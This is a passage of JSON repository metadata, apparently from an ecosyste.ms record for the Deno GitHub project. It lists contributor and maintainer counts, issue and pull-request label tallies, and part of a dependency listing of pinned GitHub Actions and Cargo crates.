recioso":2,"tatsuya6502":2,"ghosind":2,"zhanghengxin":2,"JOTSR":2,"esroyo":2,"rroblf01":2,"maxmcd":2,"leo":2,"davido7225":2,"himself65":2,"anonhostpi":2,"adakite1":2,"lionel-rowe":2,"DevJoaoLopes":2,"castarco":2,"mimikun":2,"char":2,"haturatu":2,"Mutefish0":2,"jiawei397":2,"emrul":2,"usualoma":2,"mbrdg":2,"ffMathy":2,"ArthurLobopro":2,"narumincho":2,"khrj":2,"cuishuang":2,"itsajay1029":2,"tdb-alcorn":2,"CanadaHonk":2,"nicolabovolato":2,"ghost":2,"renovate[bot]":2,"tjosepo":2,"jerry4718":2,"danieleades":2,"pepoviola":2,"Digifox03":2,"Martin978":2,"nikicat":2,"cs-clarence":2,"cotyhamilton":2,"nnmrts":2,"philipp-classen":2,"waterWang":2,"jiang1997":2,"JasonnnW3000":2,"skycoop":2,"skeithtan":2,"mplemay":2,"anupamme":2,"limwa":2,"joehillen":2,"igorbdl":2,"bcheidemann":2,"billywhizz":2,"whtsht":2,"jasonford":2,"hsjobeki":2,"ZYSzys":2,"linde12":2,"jhheider":2,"timothyis":2,"teeler":2,"wille-io":2,"mlafeldt":2,"kurtextrem":2,"odaysec":2,"denizdogan":2,"VISHNU7KASIREDDY":2,"youngwendy":2,"Hasan-Alrimawi":2,"manishsahanidev":2,"maekoos":2,"SkaillZ":2,"MattiasBuelens":2,"not-my-profile":2,"WingZer0o":2,"zcabter":2,"ije":2,"reczkok":2,"Vallabh-1504":2,"restlessronin":2,"MAKS11060":2,"stwiname":2,"jcayzac":2,"mturac":2,"carloslfu":2,"mblonyox":2,"turtletongue":2,"javihernant":2,"cu8code":2,"Kasperjoergensen3":2,"JimmyBowcott":2,"jorgelevy":2,"safaa-mojahed":2,"drivasperez":2,"c00kie17":2,"r3wretrhy":2,"nktpro":2,"testwill":2,"nana4gonta":2,"renezander030":1,"chromakode":1,"chatman-media":1,"jodinathan":1,"loigaak":1,"rista404":1,"yardenshoham":1,"rbetts":1,"Abhi3975":1,"06kellyjac":1,"Rohitb0304":1,"bolatuly":1,"lishaduck":1,"MarybethGasman":1,"UnknownHacker1":1,"pony-maggie":1,"swandir":1,"findmyhappy":1,"fhar28":1,"RomanDavlyatshin":1,"chrisveness":1,"relrelb":1,"AbhinavMir":1,"Connormiha":1,"sasivarnan":1,"ErikAbele":1,"mologie":1,"tumile":1,"EternalDeiwos":1,"taidaid":1,"charlesponti":1,"MeGaurav4":1,"seemethere":1,"iownbey":1,"lachrimae":1,"Robert0303-C":1,"josephsintum":1,"yiheng-kkk":1,"j-f1":1,"lifefloating":1,"jmao0001":1,"jchanvfx":1,"carlosLMZarego":1,"SisyphusZheng":1,"avasis-ai":1,"mindon":1,"raaymax":1,"solach":1,"bajtos":1,"paschaldesign":1,"JWalker1995":1,"gameroman":1,"roj1512":1,"Lenni009":1,"harshmathurx":1,"hukuuu":1,"TasadduqB":1,"pakoito":1,"ericlery":1,"Xernisfy":1,"ruyut":1,"juanrgon":1,"yzy-1":1,"jsejcksn":1,"charle-z":1,"RonnyChan-okta":1,"hongmengning":1,"notroid5":1,"getong":1,"AjayKumbham":1,"GoodGoodJM":1,"prettykool":1,"getspooky":1,"codykaup":1,"hawkinsw":1,"KirschBluteX":1,"fvsch":1,"ashleysyg":1,"subotac":1,"SyrupThinker":1,"Tiancheng-Xu":1,"NextThread":1,"samyosm":1,"silasbrookshaha":1,"knotbin":1,"ccheng":1,"idletea":1,"mahtaran":1,"chenrui333":1,"ikkz":1,"alexuser":1,"citrusmunch":1,"fallintoplace":1,"WasixXD":1,"vis97c":1,"gaurav0107":1,"btoo":1,"mameikagou":1,"shabani1":1,"kadumedim":1,"GJZwiers":1,"TobyEalden":1,"crowlkatstesting":1,"Andriamanitra":1,"hexmode":1,"msnandhis":1,"thezzisu":1,"pieh":1,"schwarzkopfb":1,"pttydou":1,"ljharb":1,"shreyass-ranganatha":1,"da1suk8":1,"ArakawaHenri":1,"melbinjp":1,"nuwanprabhathsoysa-star":1,"jlarmstrongiv":1,"CPunisher":1,"secext2022":1,"aryyawijaya":1,"cemelo":1,"goingforstudying-ctrl":1,"Reububble":1,"weartist":1,"leighmcculloch":1,"zkjon":1,"tsukasaI":1,"halvardssm":1,"Labeeb2339":1,"HosnainRafi":1,"sankalpsthakur":1,"puneetdixit200":1,"taljeon":1,"i-api":1,"likea-boss":1,"tmimmanuel":1,"tmdh":1,"mango766":1,"xz-dev":1,"sahandevs":1,"jaw0r3k":1,"CosminPerRam":1,"innovatedev-john-pope":1,"Elizarspbspb":1,"enjoyandlove":1,"ZackaryShen":1,"ryutamago":1,"Copilot":1,"kapil971390":1,"Bojun-Vvibe":1,"Ishant5436":1,"ntninja":1,"tomilepp":1,"Pablo-ArgF":1,"maxwell-k":1,"kitsiosk":1,"twenty-tools":1,"tredondo":1,"andrewthauer":1,"tarasglek":1,"CJstate":1,"Paul-Browne":1,"malivinayak":1,"Squirbie":1,"dojyorin":1,"techs-sus":1,"leandrohstein":1,"ChrisJr404":1,"dagecko":1,"sant123":1,"lswith":1,"senamakel":1,"garretcarrot":1,"romanzolotarev":1,"Pinta365":1,"desenesterling":1,"McSneaky":1,"Chanakyasinde":1,"marcushultman":1,"tianrking":1,"Eyal-Shalev":1,"vaaski":1,"platform-engineering-bot":1,"codesculpture":1,"osddeitf":1,"emi0x7d1":1,"Sanskar531":1,"AStox":1,"charles-dyfis-net":1,"sgvictorino":1,"MrEconomical":1,"shivamtiwari3":1,"SomeGuyWhoCodes12":1,"kajukitli":1,"raloy1102":1,"jflatow":1,"maoyouaa":1,"maniktyagi04":1,"BirruKNLABS":1,"iKislay":1,"kwhinnery":1,"loulanyue":1,"TyanSia":1,"raashish1601":1,"hugojosefson":1,"ascandone":1,"pagoru":1,"ruihe774":1,"meetdhanani17":1,"Sim-hu":1,"mattlennon3":1,"mochaaP":1,"MkDev11":1,"lusbuab":1,"avocet-bot":1,"Sean-Kenneth-Doherty":1,"Xavrir":1,"fraidev":1,"bookenjoyer67":1,"liruifengv":1,"web-dev0521":1,"mfrancis107":1,"vieiralucas":1,"SHARMA1525":1,"dajiaohuang":1,"weknowyourgame":1,"sectore":1,"HoldUpFjord":1,"zfaustk":1,"grschafer":1,"xbit33":1,"Mohsen-mhm":1,"zhenfeng-zhu":1,"armujahid":1,"murataslan1":1,"johnstonmatt":1,"xiaoas":1,"vwh":1,"hironichu":1,"rracariu":1,"zuisong":1,"armichaud":1,"imposter29":1,"DebadityaHait":1,"cryptographix":1,"deining":1,"mattiasrunge":1,"azeem30":1,"xevrion":1,"kovan":1,"mayank-Pareek":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-09-08T00:00:06.195Z","repositories_count":16982089,"issues_count":44870133,"pull_requests_count":141433925,"authors_count":11681354,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{"node compat":64,"desktop":49,"bug":33,"flaky":18,"install":16,"suggestion":14,"needs info":13,"tsgo":12,"deno fmt":9,"perf":7,"ext/web":7,"panic":7,"permissions":7,"web":7,"needs investigation":6,"tsc":6,"upstream":5,"cli":5,"compile":5,"question":5,"windows":5,"lsp":4,"testing":4,"node:http":3,"node API":3,"--watch":3,"crypto":3,"ext/http":3,"important for fresh":2,"jsr":2,"needs discussion":2,"node native extension":2,"node resolution":2,"otel":2,"webgpu":2,"resolution":2,"task runner":2,"tls":2,"types":2,"v8":2,"docs":2,"repl":1,"fix available":1,"runtime":1,"invalid":1,"swc":1,"embedder":1,"temporal":1,"ext/fs":1,"design limitation":1,"deploy":1,"node:sqlite":1,"build":1,"config":1,"auto-install":1,"ext/fetch":1,"publish":1,"lint":1,"regression":1}},"past_year_pull_request_labels_count":{"table":{"ci-full":3,"upstream":3,"dependencies":2,"patch":2,"rust":2,"ci-draft":1}},"past_year_issue_author_associations_count":{"table":{"NONE":489,"CONTRIBUTOR":137,"MEMBER":56}},"past_year_pull_request_author_associations_count":{"table":{"MEMBER":649,"CONTRIBUTOR":413,"NONE":126,"COLLABORATOR":10}},"past_year_issue_authors":{"table":{"bartlomieju":44,"steve02081504":29,"kevgeoleo":28,"davidebombelli":22,"sigmaSd":21,"crowlbot":16,"Blatman":10,"DetachHead":8,"dsherret":7,"oscarotero":6,"petamoriken":6,"mxschmitt":6,"twenty-tools":5,"pagoru":5,"quadratz":4,"KnorpelSenf":4,"tredondo":4,"piscisaureus":4,"swcarter007":4,"vdata1":4,"marvinhagemeister":4,"jeffreyschultz":4,"lowlighter":4,"digitalnature":4,"ondras":3,"magurotuna":3,"BlackAsLight":3,"nshiab":3,"Gambloide":3,"lucacasonato":3,"Hixie":3,"johndeighan":3,"hexbinoct":3,"tomas-zijdemans":3,"felipecrs":3,"jlarmstrongiv":3,"Giesch":3,"brunnerh":2,"hotrush":2,"ryuapp":2,"redradist":2,"mmayernick":2,"rickylabs":2,"Mqxx":2,"EdJoPaTo":2,"sasivarnan":2,"Reububble":2,"commongeek":2,"dandv":2,"nestarz":2,"ooker777":2,"stack72":2,"Diluka":2,"Jobians":2,"Macil":2,"lucadena":2,"hanguokai":2,"xpr0gamers":2,"xbjfk":2,"lionel-rowe":2,"guy-borderless":2,"alita-moore":2,"lenovouser":2,"AmionSky":2,"andrejcremoznik":2,"gmzacharydovel":2,"rycont":2,"gildas-lormeau":2,"lambdalisue":2,"taras":2,"TB516":2,"MILLERMARRU":2,"fry69":2,"fy2ne":2,"mhanuszh":2,"KevinMGranger":2,"mfrancis107":2,"knotbin":2,"quentinadam":2,"begoon":2,"tmcw":2,"izelnakri":2,"avocet-bot":2,"kuchta":2,"hermy991":2,"olivierdagenais":1,"Octo8080X":1,"nsf":1,"oxygen":1,"ozanmuyes":1,"paleocastro":1,"Pallob-Gain":1,"pamoller":1,"panva":1,"PatrickJS":1,"zxanderh":1,"mguetschow":1,"melbinjp":1,"mechanoid":1,"m-dressler":1,"mcpbay":1,"maxeonyx":1,"mavdotj":1,"MauScheff":1,"mattiasrunge":1,"MattiasBuelens":1,"matilda-ray-kerria":1,"MasterKale":1,"masakielastic":1,"marksvc":1,"MariusVatasoiu":1,"marcomow":1,"marc2332":1,"lunadogbot":1,"nomadshiba":1,"noamr":1,"njbraun":1,"nicolo-ribaudo":1,"NfNitLoop":1,"NeaByteLab":1,"nayeemrmn":1,"nathanwhit":1,"narcisgarcia":1,"nabsei":1,"motss":1,"mommysgoodpuppy":1,"mogwai-dev":1,"MLuc24":1,"mlilback":1,"mishushakov":1,"miksula":1,"michaelaye":1,"tugrulates":1,"tolu":1,"tobias47n9e":1,"tjconcept":1,"TimNN":1,"timepp":1,"tianalemesle":1,"Thyra":1,"thomaswelter":1,"ThinkingPlanely":1,"theTechGoose":1,"TheHans255":1,"thebenperson":1,"theaddonn":1,"terrablue":1,"tcely":1,"taoeffect":1,"takker99":1,"tainn":1,"Taha-daboussi":1,"zendive":1,"yyq1025":1,"yuchiXiong":1,"yogeshdofficial":1,"yoavweiss":1,"yibe":1,"xz-dev":1,"Xiaoqiush81":1,"WilfSilver":1,"voltrevo":1,"vis97c":1,"vicary":1,"vfssantos":1,"vbudovski":1,"uriva":1,"unoudos":1,"ul0gic":1,"ufr-scf":1,"uditkarode":1,"tv-rajesh":1,"szagi3891":1,"Rudxain":1,"rojvv":1,"rnbguy":1,"rmalizia44":1,"rivy":1,"RisaI":1,"RihanArfan":1,"RickCogley":1,"rgl":1,"regseb":1,"reallyTG":1,"RealityAnomaly":1,"PTPhongKMF":1,"polycatenane":1,"pixel-toys-chris-evans":1,"pihentagy":1,"philkunz":1,"peruibeloko":1,"paulcdejean":1,"Paul-Browne":1,"swandir":1,"stefandevo":1,"startswithaj":1,"spendres":1,"spartanatreyu":1,"sigmaxipi":1,"shyguy1412":1,"shreyassanthu77":1,"shine-on-me":1,"shannon":1,"sevmonster":1,"sepehrst":1,"scarf005":1,"sbgss":1,"sant123":1,"sabberworm":1,"ryn9":1,"rwillsonAxiom":1,"rusher":1,"RuinTD":1,"dciccale":1,"Darren-Williams-Online":1,"darksinge":1,"danroddis-razor":1,"danopia":1,"da1suk8":1,"cuishuang":1,"csvn":1,"corrideat":1,"cleanremote":1,"chances":1,"cezaryszymanski":1,"cametan":1,"callumgare":1,"BWKC":1,"BrunoBernardino":1,"brummetj":1,"brlewis":1,"brc-dd":1,"Boulea7":1,"annevk":1,"esroyo":1,"eser":1,"envis10n":1,"enjoyandlove":1,"empoalp":1,"emilfihlman":1,"ellis":1,"elizeuangelo":1,"ejsmith":1,"egasimus":1,"Eetezadi":1,"ebremer":1,"dotm4x":1,"dojyorin":1,"disjukr":1,"dionjwa":1,"diamondsw":1,"dgaubert":1,"devz00":1,"devingfx":1,"Decodetalkers":1,"anjuu-gst":1,"andyleiserson":1,"andykais":1,"amikofalvy":1,"Amatewasu":1,"AlttiRi":1,"alexgleason":1,"alexanderharding":1,"Albretch-Mueller":1,"albnnc":1,"albel727":1,"Alastyr":1,"akgurjar":1,"adamgreg":1,"absorbb":1,"AaronM04":1,"a4arpon":1,"a224327780":1,"a18-n03":1,"0f-0b":1,"bo0tzz":1,"bloomler":1,"bixu":1,"bittere":1,"betafcc":1,"berzi":1,"BerndAmend":1,"berendjansen91-stack":1,"belakun":1,"bavoco":1,"BastiDood":1,"bassamanator":1,"bai-jie":1,"baaabaaayaaagaaa":1,"ayoreis":1,"AugustinMauroy":1,"Atanu484":1,"AStox":1,"asgr-dk":1,"ArakawaHenri":1,"aofldl":1,"kitaharata":1,"kensukesaito":1,"kcastellino":1,"kasperstorgaard":1,"karl-run":1,"kantbtrue":1,"junichi-chiba":1,"julianbuettner":1,"JOTSR":1,"jonasfrey":1,"johnstonmatt":1,"jkasevits":1,"jjcastro":1,"jfernandez":1,"jeydi243":1,"jespertheend":1,"Jemory-git":1,"jduan00":1,"jamesdiacono":1,"jamesbradlee":1,"hansSchall":1,"lukas-santiago":1,"lucsoft":1,"LuckyHookin":1,"luckasnix":1,"louislam":1,"Lohann":1,"linbingquan":1,"likea-boss":1,"LenAnderson":1,"lazarv":1,"laverdet":1,"LaneSun":1,"L4G-wbsg":1,"KyleJune":1,"kurtextrem":1,"kuboon":1,"KTibow":1,"kt3k":1,"krupper":1,"KrisReal":1,"kitsonk":1,"Hajime-san":1,"grqz":1,"gilvandovieira":1,"ghostflyby":1,"gewoonwoutje":1,"GerkinDev":1,"gerabell":1,"gentlementlegen":1,"geezer78":1,"gautejohan":1,"frey-mz":1,"frankbakulov":1,"fraidev":1,"fproske":1,"foster-hangdaan":1,"Flimm":1,"fibibot":1,"fcrozatier":1,"fallible-algebra":1,"evilmonkey19":1,"JakeOShannessy":1,"JakeChampion":1,"ivypuckett":1,"iuioiua":1,"iugo":1,"itsithu":1,"ite-jankl":1,"isAdrisal":1,"iownbey":1,"Ionaru":1,"infiniteregrets":1,"imcotton":1,"IKatsuba":1,"igorbdl":1,"iensu":1,"hyperpolymath":1,"hertzg":1,"hazae41":1,"harvestcore":1,"haru0017":1,"harshvijaykumarrawat":1}},"past_year_pull_request_authors":{"table":{"bartlomieju":357,"nathanwhit":182,"divybot":82,"crowlbot":65,"crowlKats":35,"littledivy":35,"nathanwhitbot":33,"dsherret":23,"Tango992":19,"fibibot":19,"lunadogbot":19,"Rohan5commit":14,"petamoriken":11,"devsnek":11,"tomas-zijdemans":10,"denobot":10,"CertainLach":9,"nayeemrmn":8,"Hixie":6,"yyq1025":6,"rathodkunj2005":6,"minato32":5,"magurotuna":4,"badgerbees":4,"lowlighter":4,"Medo-ID":4,"KnorpelSenf":3,"piscisaureus":3,"ddevilz":3,"deepshekhardas":3,"seroperson":3,"lu-zero":3,"Hajime-san":3,"cppcoffee":3,"MLuc24":3,"xingzihai":3,"mturac":2,"lucacasonato":2,"ghost":2,"Giesch":2,"nglmercer":2,"anupamme":2,"hamidrezakp":2,"yibe":2,"adamgreg":2,"nikicat":2,"scarab-systems":2,"rnbguy":2,"sanjibani":2,"iuioiua":2,"JimmyBowcott":2,"ZayanKhan-12":2,"ryuapp":2,"ry":2,"codepage949":2,"turtletongue":2,"mplemay":2,"Vallabh-1504":2,"dependabot[bot]":2,"VISHNU7KASIREDDY":2,"diegoholiveira":2,"wahajahmed010":2,"Boulea7":2,"waterWang":2,"r3wretrhy":2,"ChrisJr404":1,"pieh":1,"Pinta365":1,"Robert0303-C":1,"pagoru":1,"pony-maggie":1,"Paul-Browne":1,"Reububble":1,"qti3e":1,"renezander030":1,"paschaldesign":1,"puneetdixit200":1,"raloy1102":1,"nuwanprabhathsoysa-star":1,"pttydou":1,"raashish1601":1,"TasadduqB":1,"techs-sus":1,"thezzisu":1,"Tiancheng-Xu":1,"tianrking":1,"tmimmanuel":1,"tredondo":1,"twenty-tools":1,"UnknownHacker1":1,"vis97c":1,"web-dev0521":1,"weknowyourgame":1,"Xavrir":1,"xbit33":1,"xevrion":1,"xz-dev":1,"yiheng-kkk":1,"ZackaryShen":1,"zfaustk":1,"ryutamago":1,"sahilmob":1,"sankalpsthakur":1,"sasivarnan":1,"scarf005":1,"Sean-Kenneth-Doherty":1,"sectore":1,"senamakel":1,"SHARMA1525":1,"shivamtiwari3":1,"sigmaSd":1,"silasbrookshaha":1,"Sim-hu":1,"SisyphusZheng":1,"Squirbie":1,"subotac":1,"swandir":1,"taljeon":1,"tarasglek":1,"CJstate":1,"Copilot":1,"CPunisher":1,"crowlkatstesting":1,"cuishuang":1,"CyanChanges":1,"da1suk8":1,"dagecko":1,"dajiaohuang":1,"dandv":1,"DebadityaHait":1,"dojyorin":1,"emi0x7d1":1,"enjoyandlove":1,"ErikAbele":1,"fallintoplace":1,"fraidev":1,"gameroman":1,"06kellyjac":1,"0f-0b":1,"Abhi3975":1,"AbhinavMir":1,"alexuser":1,"andrewthauer":1,"ArakawaHenri":1,"AStox":1,"avasis-ai":1,"avocet-bot":1,"azeem30":1,"BirruKNLABS":1,"Bojun-Vvibe":1,"bookenjoyer67":1,"Chanakyasinde":1,"charles-dyfis-net":1,"charlesponti":1,"charle-z":1,"chatman-media":1,"kt3k":1,"Labeeb2339":1,"likea-boss":1,"loigaak":1,"loulanyue":1,"mameikagou":1,"mango766":1,"maniktyagi04":1,"maoyouaa":1,"mattiasrunge":1,"maxxcs":1,"MeGaurav4":1,"melbinjp":1,"MkDev11":1,"mochaaP":1,"msnandhis":1,"murataslan1":1,"nicolo-ribaudo":1,"ntninja":1,"gaurav0107":1,"goingforstudying-ctrl":1,"GoodGoodJM":1,"harshmathurx":1,"HosnainRafi":1,"hugojosefson":1,"igorbdl":1,"iKislay":1,"imposter29":1,"innovatedev-john-pope":1,"iownbey":1,"Ishant5436":1,"jlarmstrongiv":1,"jmao0001":1,"johnstonmatt":1,"kajukitli":1,"kapil971390":1,"KirschBluteX":1,"kovan":1}},"maintainers":[{"table":{"login":"bartlomieju","count":1808,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"}},{"table":{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"}},{"table":{"login":"littledivy","count":925,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"}},{"table":{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"}},{"table":{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}},{"table":{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"}},{"table":{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"}},{"table":{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"}},{"table":{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"}},{"table":{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"}},{"table":{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"}},{"table":{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"}},{"table":{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"}},{"table":{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"}},{"table":{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"}},{"table":{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"}},{"table":{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"}},{"table":{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"}},{"table":{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"}},{"table":{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"}},{"table":{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"}},{"table":{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"}},{"table":{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"}},{"table":{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"}},{"table":{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"}},{"table":{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"}},{"table":{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}},{"table":{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}}],"active_maintainers":[{"table":{"login":"bartlomieju","count":401,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"}},{"table":{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"}},{"table":{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"}},{"table":{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"}},{"table":{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"}},{"table":{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"}},{"table":{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"}},{"table":{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"}},{"table":{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"}},{"table":{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"}},{"table":{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"}},{"table":{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}}]}},"events":null,"keywords":["deno","javascript","rust","typescript"],"dependencies":[{"ecosystem":"actions","filepath":".github/workflows/npm_publish.generated.yml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:07.745Z","updated_at":"2026-08-08T17:28:07.745Z","repository_link":"https://github.com/denoland/deno/blob/main/.github/workflows/npm_publish.generated.yml","dependencies":[{"id":25970001133,"package_name":"actions/checkout","ecosystem":"actions","requirements":"de0fac2e4500dabe0009e67214ff5f5447ce83dd","direct":true,"kind":"composite","optional":false},{"id":25970001134,"package_name":"denoland/setup-deno","ecosystem":"actions","requirements":"667a34cdef165d8d2b2e98dde39547c9daac7282","direct":true,"kind":"composite","optional":false},{"id":25970001135,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"b7c566a772e6b6bfb58ed0dc250532a479d7789f","direct":true,"kind":"composite","optional":false},{"id":25970001136,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"53b83947a5a98c8d113130e565377fae1a50d02f","direct":true,"kind":"composite","optional":false},{"id":25970001137,"package_name":"actions/download-artifact","ecosystem":"actions","requirements":"018cc2cf5baa6db3ef3c5f8a56943fffe632ef53","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/pr.generated.yml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:08.162Z","updated_at":"2026-08-08T17:28:08.162Z","repository_link":"https://github.com/denoland/deno/blob/main/.github/workflows/pr.generated.yml","dependencies":[{"id":25970001165,"package_name":"denoland/setup-deno","ecosystem":"actions","requirements":"667a34cdef165d8d2b2e98dde39547c9daac7282","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/start_release.generated.yml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:08.354Z","updated_at":"2026-08-08T17:28:08.354Z","repository_link":"https://github.com/denoland/deno/blob/main/.github/workflows/start_release.generated.yml","dependencies":[{"id":25970001363,"package_name":"actions/checkout","ecosystem":"actions","requirements":"de0fac2e4500dabe0009e67214ff5f5447ce83dd","direct":true,"kind":"composite","optional":false},{"id":25970001366,"package_name":"denoland/setup-deno","ecosystem":"actions","requirements":"667a34cdef165d8d2b2e98dde39547c9daac7282","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"cargo","filepath":"Cargo.lock","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:28:08.536Z","updated_at":"2026-08-08T17:28:08.536Z","repository_link":"https://github.com/denoland/deno/blob/main/Cargo.lock","dependencies":[{"id":25970002440,"package_name":"Inflector","ecosystem":"cargo","requirements":"0.11.4","direct":false,"kind":"runtime","optional":false},{"id":25970002445,"package_name":"addr2line","ecosystem":"cargo","requirements":"0.24.2","direct":false,"kind":"runtime","optional":false},{"id":25970002448,"package_name":"adler","ecosystem":"cargo","requirements":"1.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970002450,"package_name":"adler2","ecosystem":"cargo","requirements":"2.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002452,"package_name":"aead","ecosystem":"cargo","requirements":"0.5.2","direct":false,"kind":"runtime","optional":false},{"id":25970002455,"package_name":"aead-gcm-stream","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970002457,"package_name":"aes","ecosystem":"cargo","requirements":"0.8.3","direct":false,"kind":"runtime","optional":false},{"id":25970002459,"package_name":"aes-gcm","ecosystem":"cargo","requirements":"0.10.3","direct":false,"kind":"runtime","optional":false},{"id":25970002461,"package_name":"aes-kw","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002463,"package_name":"ahash","ecosystem":"cargo","requirements":"0.8.11","direct":false,"kind":"runtime","optional":false},{"id":25970002465,"package_name":"aho-corasick","ecosystem":"cargo","requirements":"1.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970002467,"package_name":"alloc-no-stdlib","ecosystem":"cargo","requirements":"2.0.4","direct":false,"kind":"runtime","optional":false},{"id":25970002469,"package_name":"alloc-stdlib","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970002471,"package_name":"allocator-api2","ecosystem":"cargo","requirements":"0.2.21","direct":false,"kind":"runtime","optional":false},{"id":25970002474,"package_name":"android_system_properties","ecosystem":"cargo","requirements":"0.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970002476,"package_name":"anes","ecosystem":"cargo","requirements":"0.1.6","direct":false,"kind":"runtime","optional":false},{"id":25970002478,"package_name":"anstream","ecosystem":"cargo","requirements":"0.6.15","direct":false,"kind":"runtime","optional":false},{"id":25970002481,"package_name":"anstyle","ecosystem":"cargo","requirements":"1.0.8","direct":false,"kind":"runtime","optional":false},{"id":25970002483,"package_name":"anstyle-parse","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970002485,"package_name":"anstyle-query","ecosystem":"cargo","requirements":"1.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970002487,"package_name":"anstyle-wincon","ecosystem":"cargo","requirements":"3.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970002489,"package_name":"anyhow","ecosystem":"cargo","requirements":"1.0.98","direct":false,"kind":"runtime","optional":false},{"id":25970002491,"package_name":"approx","ecosystem":"cargo","requirements":"0.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970002494,"package_name":"arbitrary","ecosystem":"cargo","requirements":"1.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970002496,"package_name":"arc-swap","ecosystem":"cargo","requirements":"1.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970002498,"package_name":"argon2","ecosystem":"cargo","requirements":"0.6.0-rc.8","direct":